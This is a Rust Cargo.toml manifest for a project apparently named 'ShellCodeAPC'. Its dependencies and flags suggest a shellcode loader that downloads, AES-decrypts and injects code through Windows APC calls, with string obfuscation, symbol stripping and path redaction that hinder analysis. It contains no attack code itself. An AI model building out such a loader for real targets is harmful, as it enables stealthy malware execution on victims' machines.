[package]
name = "ShellCodeAPC"
version = "0.1.0"
edition = "2021"

[dependencies]
export-resolver = "1.0.3"
obfstr = "0.4.4"
aes = "0.7"
cfb-mode = "0.7"
reqwest = { version = "0.12.15", features = ["blocking"] }
once_cell = "1.21.3"

[dependencies.windows]
version = "0.61.1"
features = [
    "Win32_System_Threading",
    "Win32_System_Memory",
    "Win32_System_SystemInformation",
    "Win32_System_Diagnostics",
    "Win32_System_Diagnostics_Debug",
]


[profile.release]
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"
strip = "symbols"
debug = false
overflow-checks = false
incremental = false

[build]
rustflags = [
  "--remap-path-prefix", "C:\\Users=/redacted",
  "--remap-path-prefix=C:/Users=/redacted",
  "--remap-path-prefix", "C:/Users=/redacted",
  "--remap-path-scope=all",
  "-Clink-arg=/DEBUG:NONE",
]